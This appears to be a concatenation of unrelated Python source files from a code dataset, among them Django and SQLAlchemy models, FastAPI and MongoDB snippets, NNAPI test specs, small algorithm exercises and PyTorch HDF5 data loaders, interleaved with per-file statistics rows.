def test_simulate_battle():
player = Character(8, 5, 5)
boss = Character(12, 7, 2)
assert simulate_battle(player, boss) == player
| 24.285714 | 50 | 0.703529 | 120 | 850 | 4.816667 | 0.233333 | 0.124567 | 0.145329 | 0.17301 | 0.513841 | 0.439446 | 0.391003 | 0.391003 | 0.391003 | 0.391003 | 0 | 0.035451 | 0.203529 | 850 | 34 | 51 | 25 | 0.818316 | 0 | 0 | 0.375 | 0 | 0 | 0.007059 | 0 | 0 | 0 | 0 | 0 | 0.541667 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e2daf5c89878da51cbda4e6d7296e048a9f4b24c | 695 | py | Python | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | app/mysql-sqlalchemy.py | garryforgit/flasky | 7117023bf69180b8eacae9dde69c621668ddf11d | [
"MIT"
] | null | null | null | # coding:utf-8
from flask_sqlalchemy import SQLAlchemy
from hello import db
#SQLALCHEMY_DATABASE_URL="mysql://fly:('flyfly')@localhost/test1"
#SQLALCHEMY_TRACK_MODIFICATIONS = True
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' % self.username
| 24.821429 | 65 | 0.684892 | 96 | 695 | 4.708333 | 0.447917 | 0.088496 | 0.110619 | 0.079646 | 0.311947 | 0.269912 | 0.269912 | 0.146018 | 0 | 0 | 0 | 0.010435 | 0.172662 | 695 | 27 | 66 | 25.740741 | 0.775652 | 0.16259 | 0 | 0.266667 | 0 | 0 | 0.062284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0.133333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
e2e93dbd6f3076026b046be68bc59debb3b4ccbc | 775 | py | Python | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | null | null | null | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | 1 | 2016-01-19T12:32:32.000Z | 2016-01-19T12:32:32.000Z | notes/_views/viewsets.py | Merino/poc-cbb | eed2226a7d7fbff5d8860075fbdd641f5281dce5 | [
"BSD-3-Clause"
] | null | null | null | # # encoding: utf-8
#
# from django.conf.urls import patterns, include
# from django.core.urlresolvers import reverse_lazy
#
#
# class BaseViewSet(object):
# def __init__(self, **kwargs):
# super(BaseViewSet, self).__init__()
# for key, value in kwargs.iteritems():
# assert hasattr(self, key), 'Pass unknown parameter'
# setattr(self, key, value)
#
# def get_urls(self):
# urls = []
# nested = patterns('', *urls)
# return include(nested)
#
# def reverse(self, name, *args, **kwargs):
# return reverse_lazy(name, args=args, kwargs=kwargs)
#
# @property
# def urls(self):
# if not hasattr(self, '_urls'):
# self._urls = self.get_urls()
# return self._urls | 29.807692 | 65 | 0.587097 | 87 | 775 | 5.057471 | 0.471264 | 0.072727 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00177 | 0.270968 | 775 | 26 | 66 | 29.807692 | 0.776991 | 0.930323 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
390037201d83cd63c3a8e971c39f1519d819722c | 2,052 | py | Python | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | blog/migrations/0005_auto_20190624_1315.py | Labbit-kw/hologram-project | 708b773e932f6ad0f92d1d9e2e57cfbd8b17b933 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-06-24 04:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_board'),
]
operations = [
migrations.DeleteModel(
name='Board',
),
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-comments',), 'verbose_name': 'post', 'verbose_name_plural': 'posts'},
),
migrations.RemoveField(
model_name='post',
name='content',
),
migrations.RemoveField(
model_name='post',
name='create_date',
),
migrations.RemoveField(
model_name='post',
name='description',
),
migrations.RemoveField(
model_name='post',
name='modify_date',
),
migrations.RemoveField(
model_name='post',
name='slug',
),
migrations.AddField(
model_name='post',
name='comments',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='post',
name='date',
field=models.DateField(auto_now_add=True, null=True, verbose_name='Create Date'),
),
migrations.AddField(
model_name='post',
name='name',
field=models.CharField(blank=True, max_length=100),
),
migrations.AddField(
model_name='post',
name='user_id',
field=models.CharField(blank=True, max_length=20),
),
migrations.AddField(
model_name='post',
name='views',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(blank=True, max_length=100),
),
migrations.DeleteModel(
name='Comment',
),
]
| 27.72973 | 105 | 0.515595 | 180 | 2,052 | 5.744444 | 0.338889 | 0.10058 | 0.138298 | 0.180851 | 0.573501 | 0.573501 | 0.313346 | 0.195358 | 0.098646 | 0 | 0 | 0.020501 | 0.358187 | 2,052 | 73 | 106 | 28.109589 | 0.764617 | 0.02193 | 0 | 0.61194 | 1 | 0 | 0.109227 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3903624fd80c505f90cadf8b4dfe22f77c2294fc | 647 | py | Python | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | 9 | 2019-02-06T10:02:02.000Z | 2022-02-24T16:38:36.000Z | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | null | null | null | rosmap/repository_analyzers/offline/i_repository_analyzer.py | jr-robotics/rosmap | eae425c94b43e46227a11d645bb7baa1fc5c5b35 | [
"MIT"
] | 1 | 2020-01-13T00:43:03.000Z | 2020-01-13T00:43:03.000Z | from abc import ABCMeta, abstractmethod
class IRepositoryAnalyzer(object):
"""
Interface for classes implementing Repository-analysis.
"""
__metaclass__ = ABCMeta
@abstractmethod
def analyze_repositories(self, path: str, repo_details: dict) -> None:
"""
Analyzes all repositories directly under the root of the given path (does not recurse).
:param path: Path to the repositories.
:param repo_details: Details about the repositories.
:return: None
"""
raise NotImplementedError
@abstractmethod
def analyzes(self) -> str:
raise NotImplementedError
| 28.130435 | 95 | 0.673879 | 65 | 647 | 6.6 | 0.646154 | 0.097902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255023 | 647 | 22 | 96 | 29.409091 | 0.890041 | 0.384853 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
39080a3dcea4b5bb7e1c10d7b1be6ca6edf82165 | 2,814 | py | Python | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 255 | 2020-05-22T07:45:29.000Z | 2022-03-29T23:58:22.000Z | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 5,102 | 2020-05-22T07:48:33.000Z | 2022-03-31T23:43:39.000Z | tests/nnapi/specs/V1_0/concat_float_4D_axis3_1_nnfw.mod.py | periannath/ONE | 61e0bdf2bcd0bc146faef42b85d469440e162886 | [
"Apache-2.0"
] | 120 | 2020-05-22T07:51:08.000Z | 2022-02-16T19:08:05.000Z | #
# Copyright (C) 2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 0
i2 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 1
i3 = Input("op3", "TENSOR_FLOAT32", "{1, 2, 3, 2}") # input tensor 2
axis0 = Int32Scalar("axis0", 3)
r = Output("result", "TENSOR_FLOAT32", "{1, 2, 3, 6}") # output
model = model.Operation("CONCATENATION", i1, i2, i3, axis0).To(r)
# Example 1.
input0 = {i1: [-0.03203143, -0.0334147 , -0.02527265, 0.04576106, 0.08869292,
0.06428383, -0.06473722, -0.21933985, -0.05541003, -0.24157837,
-0.16328812, -0.04581105],
i2: [-0.0569439 , -0.15872048, 0.02965238, -0.12761882, -0.00185435,
-0.03297619, 0.03581043, -0.12603407, 0.05999133, 0.00290503,
0.1727029 , 0.03342071],
i3: [ 0.10992613, 0.09185287, 0.16433905, -0.00059073, -0.01480746,
0.0135175 , 0.07129054, -0.15095694, -0.04579685, -0.13260484,
-0.10045543, 0.0647094 ]}
output0 = {r: [-0.03203143, -0.0334147 , -0.0569439 , -0.15872048, 0.10992613,
0.09185287, -0.02527265, 0.04576106, 0.02965238, -0.12761882,
0.16433905, -0.00059073, 0.08869292, 0.06428383, -0.00185435,
-0.03297619, -0.01480746, 0.0135175 , -0.06473722, -0.21933985,
0.03581043, -0.12603407, 0.07129054, -0.15095694, -0.05541003,
-0.24157837, 0.05999133, 0.00290503, -0.04579685, -0.13260484,
-0.16328812, -0.04581105, 0.1727029 , 0.03342071, -0.10045543,
0.0647094 ]}
# Instantiate an example
Example((input0, output0))
'''
# The above data was generated with the code below:
with tf.Session() as sess:
t1 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t2 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
t3 = tf.random_normal([1, 2, 3, 2], stddev=0.1, dtype=tf.float32)
c1 = tf.concat([t1, t2, t3], axis=3)
print(c1) # print shape
print( sess.run([tf.reshape(t1, [12]),
tf.reshape(t2, [12]),
tf.reshape(t3, [12]),
tf.reshape(c1, [1*2*3*(2*3)])]))
'''
| 43.292308 | 79 | 0.602701 | 406 | 2,814 | 4.160099 | 0.369458 | 0.010657 | 0.01421 | 0.016578 | 0.448786 | 0.120782 | 0.120782 | 0.120782 | 0.071048 | 0.071048 | 0 | 0.346369 | 0.236674 | 2,814 | 64 | 80 | 43.96875 | 0.439944 | 0.236318 | 0 | 0 | 0 | 0 | 0.086984 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
390b1fb2d4091aecc904734a5d0a639eb8b4e4a8 | 519 | py | Python | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | routers/epic.py | chenx6/message-integration-api | 5a80eac8d72620af87bbdb16cf489858001c9d8f | [
"MIT"
] | null | null | null | from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session
from schemas.item_resp import ItemsResp
from crud.epic_free_game import get_epic_free_game
from utils import get_db
router = APIRouter(prefix="/api", tags=["epic"])
@router.get("/epic", response_model=ItemsResp)
async def epic_free_game(start: int = 0, db: Session = Depends(get_db)):
if start != 0:
return ItemsResp(status="fail", items=[])
items = get_epic_free_game(db)
return ItemsResp(status="success", items=items)
| 30.529412 | 72 | 0.745665 | 76 | 519 | 4.907895 | 0.473684 | 0.085791 | 0.128686 | 0.080429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004494 | 0.142582 | 519 | 16 | 73 | 32.4375 | 0.833708 | 0 | 0 | 0 | 0 | 0 | 0.046243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
390dcff9eeeb910ef17bc178dc5eea38e986422e | 453 | py | Python | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | import unittest
import longest_increasing_subsequence
class Solution(unittest.TestCase):
def test_one(self):
sr = longest_increasing_subsequence.Solution()
self.assertEqual(sr.lengthOfLIS([10,9,2,5,3,7,101,18]), 4)
    # def test_two(self):
    #     sr = longest_increasing_subsequence.Solution()
    #     self.assertEqual(sr.lengthOfLIS([0,2,3,4,6,8,9]), 7)
if __name__ == '__main__':
    unittest.main()
if __name__ == '__main__':
unittest.main() | 30.2 | 84 | 0.664459 | 63 | 453 | 4.52381 | 0.492063 | 0.178947 | 0.294737 | 0.161404 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0 | 0.068783 | 0.165563 | 453 | 15 | 85 | 30.2 | 0.685185 | 0.328918 | 0 | 0 | 0 | 0 | 0.026578 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
392373959dae05b7051126f3234a23ca69f13125 | 383 | py | Python | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | 15 | 2018-05-12T17:15:59.000Z | 2020-09-06T04:32:47.000Z | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | null | null | null | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | 2 | 2018-06-29T00:44:52.000Z | 2020-07-07T01:58:03.000Z | from pymongo import MongoClient
from pymongo.database import Database
from pymongo.collection import Collection
shop_collection = Collection(Database(MongoClient(host='10.1.17.15'), 'dspider2'), 'shops')
for i in shop_collection.find({'data_source':'餐饮', 'data_region':'千岛湖', 'data_website':'大众点评', 'shop_url':'http://www.dianping.com/shop/66205575'}):
print(i.get('shop_time')) | 54.714286 | 148 | 0.75718 | 54 | 383 | 5.240741 | 0.62963 | 0.116608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045198 | 0.075718 | 383 | 7 | 149 | 54.714286 | 0.754237 | 0 | 0 | 0 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
39377de863e650c1264040afbd97357846b6a236 | 247 | py | Python | answers/Anuraj Pariya/day 18/question 1.py | justshivam/30-DaysOfCode-March-2021 | 64d434c07b9ec875384dee681a3eecefab3ddef0 | [
"MIT"
] | 22 | 2021-03-16T14:07:47.000Z | 2021-08-13T08:52:50.000Z | answers/Anuraj Pariya/day 18/question 1.py | AnurajPariya03/30-DaysOfCode-March-2021 | 2fb575d06a3c86bc890e7fb97d321eba8f93157f | [
"MIT"
] | 174 | 2021-03-16T21:16:40.000Z | 2021-06-12T05:19:51.000Z | answers/Anuraj Pariya/day 18/question 1.py | AnurajPariya03/30-DaysOfCode-March-2021 | 2fb575d06a3c86bc890e7fb97d321eba8f93157f | [
"MIT"
] | 135 | 2021-03-16T16:47:12.000Z | 2021-06-27T14:22:38.000Z | def perfect_square(x):
if (x == 0 or x == 1):
return x
i = 1
result = 1
while (result <= x):
i += 1
result = i * i
return i - 1
x = int(input('Enter no.'))
print(perfect_square(x))
| 15.4375 | 27 | 0.437247 | 36 | 247 | 2.944444 | 0.472222 | 0.056604 | 0.264151 | 0.169811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.425101 | 247 | 15 | 28 | 16.466667 | 0.704225 | 0 | 0 | 0 | 0 | 0 | 0.036437 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.272727 | 0.090909 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3939463bd0f07c5f73d7be7ea0d782b5a2f136d8 | 1,383 | py | Python | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (C) 2016 Red Hat <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
INPUT_FORMAT = re.compile("^[a-zA-Z0-9_-]+$", re.U)
def get_values(line):
return [u.strip() for u in line.split('|') if u.strip() != '']
def get_age(age):
days, hours, minutes, sec = age.split(':')
return (((int(days) * 24) + int(hours))*60 + int(minutes))*60 + int(sec)
def validate_input(input):
return INPUT_FORMAT.match(input)
def validate_ssh_key(public_key):
try:
key_type, key, comment = public_key.split()
if key_type not in ("ssh-rsa", "ssh-ecdsa", "ssh-ed25519"):
raise ValueError("Invalid key type")
if not re.match("^[A-Za-z0-9+/]+[=]{0,3}$", key):
raise ValueError("Invalid key data")
except ValueError:
raise ValueError("Invalid public key")
| 30.065217 | 76 | 0.670282 | 209 | 1,383 | 4.37799 | 0.535885 | 0.065574 | 0.072131 | 0.034973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022462 | 0.195228 | 1,383 | 45 | 77 | 30.733333 | 0.799641 | 0.430224 | 0 | 0 | 0 | 0 | 0.153946 | 0.031048 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.055556 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
393b93af5c514b1526b31d876323699fbb60feaf | 748 | py | Python | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | # Default delimiters
INPUT1 = '''
pid 2
uptime 675
version 1.2.5 END
pid 1
uptime 2
version 3
END
'''
OUTPUT1 = '''{"pid": "2", "uptime": "675", "version": "1.2.5"}
{"pid": "1", "uptime": "2", "version": "3"}
'''
# --field-delim '=', --record-delim '%\n'
INPUT2 = '''
a=1
b=2
c=3
%
d=4
e=5
f=6
%
'''
OUTPUT2 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
# --field-delim '=', --entry-delim '|' --record-delim '%\n'
INPUT3 = '''
a=1|b=2|c=3%
d=4|e=5|f=6%
'''
OUTPUT3 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
# --field-delim '=', --entry-delim '|' --record-delim '%'
INPUT4 = '''
a=1|b=2|c=3%d=4|e=5|f=6%
'''
OUTPUT4 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
| 14.666667 | 62 | 0.42246 | 130 | 748 | 2.430769 | 0.246154 | 0.037975 | 0.056962 | 0.075949 | 0.689873 | 0.689873 | 0.56962 | 0.56962 | 0.424051 | 0.424051 | 0 | 0.103728 | 0.175134 | 748 | 50 | 63 | 14.96 | 0.408428 | 0.229947 | 0 | 0.289474 | 0 | 0.052632 | 0.749123 | 0.042105 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
39526d9c160599ac5932ecb9465bcdc3176c4e72 | 128 | py | Python | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 7 | 2017-03-07T03:05:12.000Z | 2021-03-19T17:12:46.000Z | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 15 | 2017-02-06T17:11:01.000Z | 2018-08-18T02:55:17.000Z | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 5 | 2017-02-05T18:20:00.000Z | 2021-11-14T20:20:42.000Z | """Meta information for csv2sql."""
__version__ = '0.4.1'
__author__ = 'Yu Mochizuki'
__author_email__ = 'ymoch.dev@gmail.com'
| 21.333333 | 40 | 0.71875 | 17 | 128 | 4.647059 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.117188 | 128 | 5 | 41 | 25.6 | 0.663717 | 0.226563 | 0 | 0 | 0 | 0 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1a4105ad71311c7d4ce3c72af3483de90d72f0ab | 1,877 | py | Python | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | 1 | 2021-07-22T06:10:08.000Z | 2021-07-22T06:10:08.000Z | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | null | null | null | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | 2 | 2021-07-15T08:18:32.000Z | 2022-03-28T20:56:28.000Z | import torch
from torch.utils.data import DataLoader, TensorDataset
from argparse import Namespace
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import h5py
import json
import os
def load_data_1scale(hdf5_file, ndata, batch_size, singlescale=True):
with h5py.File(hdf5_file, 'r') as f:
x_data = f['train'][:ndata]
    # only one scale is loaded in this function, so the tuple holds a single tensor
    data_tuple = (torch.FloatTensor(x_data), )
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
return data_loader
def load_data_2scales(hdf5_file,hdf5_file1, ndata, batch_size, singlescale=False):
with h5py.File(hdf5_file, 'r') as f:
x2_data = f['train'][:ndata]
with h5py.File(hdf5_file1, 'r') as f:
x1_data = f['train'][:ndata]
    data_tuple = (torch.FloatTensor(x2_data), ) if singlescale else (
        torch.FloatTensor(x2_data), torch.FloatTensor(x1_data))
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
print(f'Loaded dataset: {hdf5_file}')
return data_loader
def load_data_3scales(hdf5_file,hdf5_file1,hdf5_file2, ndata, batch_size, singlescale=False):
with h5py.File(hdf5_file, 'r') as f:
x3_data = f['train'][:ndata]
with h5py.File(hdf5_file1, 'r') as f:
x2_data = f['train'][:ndata]
with h5py.File(hdf5_file2, 'r') as f:
x1_data = f['train'][:ndata]
    data_tuple = (torch.FloatTensor(x3_data), ) if singlescale else (
        torch.FloatTensor(x3_data), torch.FloatTensor(x2_data), torch.FloatTensor(x1_data))
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
return data_loader
| 32.929825 | 94 | 0.69366 | 265 | 1,877 | 4.690566 | 0.207547 | 0.128721 | 0.057924 | 0.077233 | 0.711183 | 0.711183 | 0.680611 | 0.680611 | 0.661303 | 0.661303 | 0 | 0.025726 | 0.192328 | 1,877 | 56 | 95 | 33.517857 | 0.794195 | 0 | 0 | 0.525 | 0 | 0 | 0.0336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.225 | 0 | 0.375 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
